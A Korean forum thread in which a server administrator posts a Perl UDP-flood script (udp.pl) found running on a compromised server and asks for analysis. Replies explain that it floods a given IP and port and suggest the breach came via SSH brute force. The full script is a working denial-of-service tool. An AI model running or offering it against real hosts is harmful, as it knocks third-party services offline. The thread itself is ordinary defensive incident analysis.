[완료] 펄 스크립터 분석 부탁 드립니다.
운영하는 서버에 엄청난 트래픽이 발생하여 살펴 보았더니 아래 내용의 스크립터가
돌아가고 있었습니다.
일단 실행중인 스크립터를 죽이고 외부 접속을 차단 해 놓았으나 그래도 찜찜하네요.
아래 스크립터가 무엇을 하게 되어 있는지 분석 부탁 드립니다.
파일이름:udp.pl
#!/usr/bin/perl
use Socket;
$ARGC=@ARGV;
if ($ARGC !=3) {
printf "$0 \n";
printf "for any info vizit http://hacking.3xforum.ro/ \n";
exit(1);
}
my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];
socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");
printf "Amu Floodez $ip pe portu $port \n";
printf "daca nu pica in 10 min dai pe alt port \n";
if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}
packets:
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}
randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}
미리 감사드립니다.
^^
음...
ip, port, time 을 입력으로 받아서, 주어진 시간 이후에 해당 ip, port 로 udp flooding 을 하는 코드인것 같네요.
직접 실행시킨게 아니라면, 해당 서버가 침해 당했을 가능성이 높습니다.
되면 한다! / feel no sorrow, feel no pain, feel no hurt, there's nothing gained.. only love will then remain.. 『 Mizz 』
되면 한다! / feel no sorrow, feel no pain, feel no hurt, there's nothing gained.. only love will then remain.. 『 Mizz 』
감사합니다.
스크립터상의 사용자 권한이 아파치로 되어 있어서 root는 괜찬은 걸로 보이기는 하는데...
서버를 좀더 확인해 보아야 겠네요.
감사합니다.
보통은
ssh brute force attack 공격으로 일반 계정이 뚫리면(사전 대입식으로 암호를 알아 내면)
위의 유형의 스크립트를 많이 돌리더군요.
공격자가 지정한 대역대로 포트 스캔 또는 udp flood를 보내는 경우가 있었습니다.
(딱 한번 경험 해봤네요.., 그때 저장한 스크립트 소스도 위와 비슷하네요 ㅋ)
======
깔깔깔
======
댓글 달기